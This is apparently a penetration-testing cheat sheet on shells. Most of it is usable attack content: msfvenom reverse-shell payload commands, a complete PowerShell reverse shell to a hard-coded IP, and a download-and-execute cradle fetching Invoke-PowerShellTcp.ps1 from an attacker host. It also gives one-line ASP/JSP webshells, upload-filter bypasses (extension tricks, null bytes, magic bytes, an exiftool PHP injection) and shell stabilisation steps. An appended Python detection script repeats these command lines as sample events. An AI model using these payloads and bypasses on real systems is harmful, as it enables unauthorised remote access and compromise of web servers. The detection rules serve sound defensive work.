# Shells

## Table of contents

##### ➤ Shells

* [Reverse shell](#reverse-shell)
* [Single line webshell](#single-line-webshell)
* [Online generator](#online-generator)

##### ➤ Upload bypass

* [Rename the extension](#rename-the-extension)
* [Bypass the extension checks](#bypass-the-extension-checks)
* [Bypass using the content-type](#bypass-using-the-content-type)
* [Magic number](#magic-number)

##### ➤ Shell Stabilisation

* [Technique 01: Python](#technique-01-python)
* [Technique 02: Script](#technique-02-script)
* [Technique 03: Rlwrap](#technique-03-rlwrap)
* [Technique 04: Socat](#technique-04-socat)

# ⭕ Shells

## 🔻Reverse shell

#### ➤ Linux - MSFVenom
```
msfvenom -p linux/x86/shell_reverse_tcp LHOST= LPORT= -f elf > shell-x86.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST= LPORT= -f elf > shell-x64.elf
```

#### ➤ Windows - MSFVenom
```
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f exe > shell-x86.exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST= LPORT= -f exe > shell-x64.exe
```

#### ➤ Powershell
```
powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.194',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```

#### ➤ ASP
```
msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f asp > shell.asp
```

#### ➤ ASPX
```
msfvenom -p windows/shell/reverse_tcp LHOST= LPORT= -f aspx > shell.aspx
```

#### ➤ JSP
```
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp
```

#### ➤ WAR
```
msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war
```

#### ➤ PHP
```
msfvenom -p php/reverse_php LHOST= LPORT= -f raw > shell.php
```

#### ➤ HTA
```
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f hta-psh > shell.hta
```

#### ➤ DLL
```
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT= -f dll > shell.dll
```

#### ➤ Upload and execution
```
# This one-liner downloads the reverse shell script Invoke-PowerShellTcp.ps1 from the attacker's web server and executes it to obtain a reverse shell
# Reverse shell : https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
# Raw direct link : https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
powershell iex (New-Object Net.WebClient).DownloadString('http://10.0.0.1:4444/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.0.0.1 -Port 443
```

## 🔻Single line Webshell

#### ➤ PHP
```

```

#### ➤ ASP
```
<% eval request("cmd") %>
```

#### ➤ JSP
```
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
```

## 🔻Online Generator

* https://www.revshells.com/
* https://weibell.github.io/reverse-shell-generator/

# ⭕ Upload Bypass

## 🔻Rename the extension
```
• PHP: .php, .php2, .php3, .php4, .php5, .php6, .php7, .phps, .pht, .phtm, .phtml, .pgif, .shtml, .htaccess, .phar, .inc, .hphp, .ctp, .module

• PHP8: .php, .php4, .php5, .phtml, .module, .inc, .hphp, .ctp

• ASP: .asp,
  .aspx, .config, .ashx, .asmx, .aspq, .axd, .cshtm, .cshtml, .rem, .soap, .vbhtm, .vbhtml, .asa, .cer, .shtml

• PERL: .pl, .pm, .cgi, .lib

• JSP: .jsp, .jspx, .jsw, .jsv, .jspf, .wss, .do, .action

• Coldfusion: .cfm, .cfml, .cfc, .dbm

• Flash: .swf

• Erlang Yaws Web Server: .yaws
```

## 🔻Bypass the extension checks

#### ➤ Using some uppercase letters
```
.pHp, .pHP5, .aSPx, .jSp ...
```

#### ➤ Adding a valid extension before

• For example, if .png is the only authorized extension:
```
reverseshell.png.php
```

• It is also possible to combine this with uppercase letters:
```
reverseshell.png.Php5
reverseshell.png.pHTml
```

#### ➤ Add special characters at the end

• Some examples:
```
reverseshell.php%20
reverseshell.php%0a
reverseshell.php%00
reverseshell.php%0d%0a
reverseshell.php/
reverseshell.php.\
reverseshell.
reverseshell.php....
```
• It is also possible to combine this with the previous bypass:
```
reverseshell.php5%0a
reverseshell.pHP5%0a
```

#### ➤ Add a double extension with junk data between them

• Some examples:
```
reverseshell.php#.png
reverseshell.php%00.png
reverseshell.php\x00.png
reverseshell.php%0a.png
reverseshell.php%0d%0a.png
reverseshell.phpJunk123png
```

• It is also possible to combine this with uppercase letters:
```
reverseshell.png%00pHp5
```

#### ➤ Add another layer of extensions

• Some examples:
```
file.png.jpg.php
```

• It is also possible to combine this with uppercase letters:
```
file.php%00.png%00.jpg
file.pHp%00.pNg%00.jPg
```

## 🔻Bypass using the content-type

Examples of Content-Type values an upload filter may accept:
- image/jpeg
- application/pdf

#### ➤ 1. Initial request (upload of a PHP reverse shell)

![image](https://github.com/Kiosec/Shells/assets/100965892/609150ce-69ac-4769-99cf-155e9d78eeae)

#### ➤ 2. Burp interception and modification

![image](https://github.com/Kiosec/Shells/assets/100965892/27a84575-0816-419b-86da-3d2972badfb5)

## 🔻Magic number

An image is identified by its first bytes (its magic number). It is possible to hide a webshell from such a check by putting a valid image header at the beginning of the webshell file.

#### ➤ GIF
```
Basically you just add the text "GIF89a;" before your shell code.
For example:

GIF89a;
```

#### ➤ JPEG
```
printf "\xff\xd8\xff\xe0" > image.jpg
```

#### ➤ Inject PHP code into the information/comment field of the image
```
exiftool -Comment='"; system($_GET['cmd']); ?>' image.jpg
```

# ⭕ Shell Stabilisation

## 🔻Technique 01: Python
```
➤ Step 01: use Python to spawn a better-featured bash shell
python -c 'import pty;pty.spawn("/bin/bash")'

➤ Step 02: this gives us access to term commands such as clear
export TERM=xterm

➤ Step 03: background the shell using Ctrl + Z
Ctrl+Z

➤ Step 04: back in our own terminal we use stty raw -echo; fg. This does two things: first, it turns off our own terminal echo (which gives us access to tab autocompletion, the arrow keys, and Ctrl + C to kill processes). It then foregrounds the shell, thus completing the process.
stty raw -echo; fg

Note that if the shell dies, any input in your own terminal will not be visible (as a result of having disabled terminal echo). To fix this, type reset and press Enter.

➤ Example:
kiosec@lab:~$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.0.0.1] from (unknown) [10.1.1.1] 43298

python3 -c 'import pty;pty.spawn("/bin/bash")'
user@box:~$ export TERM=xterm
export TERM=xterm
user@box:~$ ^Z
[1]+ Stopped sudo nc -lvnp 443
kiosec@lab:~$ stty raw -echo; fg
nc -lvnp 443

user@box:~$ whoami
user
user@box:~$ ^C
user@box:~$
```

## 🔻Technique 02: Script
```
$ script /dev/null -c bash
Script started, output log file is '/dev/null'.
kiosec@mycyberlab:/home/kiosec$
```

## 🔻Technique 03: Rlwrap
rlwrap gives a more fully featured shell, including access to history, tab autocompletion and the arrow keys immediately upon receiving a shell.
This technique is particularly useful with a Windows shell.

```
➤ Step 01: install rlwrap (not installed by default on Kali)
apt install rlwrap

➤ Step 02: invoke the listener
rlwrap nc -lnvp 

[additional steps for a Linux target]
➤ Step 03: background the shell using Ctrl + Z
Ctrl+Z

➤ Step 04: back in our own terminal we use stty raw -echo; fg. This does two things: first, it turns off our own terminal echo (which gives us access to tab autocompletion, the arrow keys, and Ctrl + C to kill processes). It then foregrounds the shell, thus completing the process.
stty raw -echo; fg
```

## 🔻Technique 04: Socat
Restricted to Linux targets.

```
➤ Prerequisite: obtain socat on the Linux target.

➤ Step 01: transfer a statically compiled socat binary (e.g., using python http.server)
https://github.com/andrew-d/static-binaries/blob/master/binaries/linux/x86_64/socat?raw=true

➤ Step 02: on Kali, start the listener
socat TCP-L: FILE:`tty`,raw,echo=0

➤ Step 03: execute the reverse shell on the target.

➤ Step 04: once connected to the target, execute the special socat command in order to
socat TCP:: EXEC:"bash -li",pty,stderr,sigint,setsid,sane
```
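From the detection side, the commands in the Shell Stabilisation section above (pty.spawn, script /dev/null, socat with EXEC and pty) and the Invoke-PowerShellTcp download cradle are almost never typed by legitimate users, which makes them high-fidelity process-creation indicators. The rules below are an added example, not part of the original page; the event tuples are constructed samples and the rule names are made up for illustration.

```python
import re

# Constructed process-creation events (not real logs): (pid, parent image, command line).
# The suspicious command lines are the stabilisation and download commands from this page.
EVENTS = [
    (4011, "nc", "python3 -c 'import pty;pty.spawn(\"/bin/bash\")'"),
    (4012, "bash", "export TERM=xterm"),
    (4020, "sh", "script /dev/null -c bash"),
    (4031, "bash", 'socat TCP:10.0.0.1:4444 EXEC:"bash -li",pty,stderr,sigint,setsid,sane'),
    (4040, "w3wp.exe", "powershell iex (New-Object Net.WebClient).DownloadString('http://10.0.0.1:4444/Invoke-PowerShellTcp.ps1')"),
    (4050, "bash", "python3 manage.py runserver"),   # benign interpreter use
    (4051, "bash", "script -q session.log"),          # benign script(1) use
]

# Listeners/relays whose child processes are normally not shells or interpreters.
NETWORK_TOOLS = {"nc", "ncat", "netcat", "socat"}
SHELL_OR_INTERPRETER = re.compile(
    r"^\s*(?:/\S*/)?(?:ba|z|da)?sh\b|^\s*(?:/\S*/)?(?:python|perl|ruby)\d*(?:\.\d+)?\b")

# Each rule is (name, pattern over the command line).
RULES = [
    ("pty_spawn_from_interpreter", re.compile(r"pty\.spawn\s*\(")),
    ("script_devnull_tty", re.compile(r"\bscript\b.*\s/dev/null(?:\s|$)")),
    ("socat_pty_exec", re.compile(r"\bsocat\b.*\bEXEC:.*\bpty\b")),
    ("powershell_download_cradle", re.compile(
        r"\b(?:iex|invoke-expression)\b.*downloadstring\(|downloadstring\(.*\b(?:iex|invoke-expression)\b", re.I)),
]

def detect(events):
    """Return sorted (pid, rule_name) pairs for every event that matches a rule."""
    hits = set()
    for pid, parent, cmdline in events:
        for name, pattern in RULES:
            if pattern.search(cmdline):
                hits.add((pid, name))
        # A shell or interpreter whose parent is a network tool is the reverse shell itself.
        if parent.lower() in NETWORK_TOOLS and SHELL_OR_INTERPRETER.search(cmdline):
            hits.add((pid, "shell_spawned_by_network_tool"))
    return sorted(hits)

if __name__ == "__main__":
    for pid, rule in detect(EVENTS):
        print(f"pid {pid}: {rule}")
```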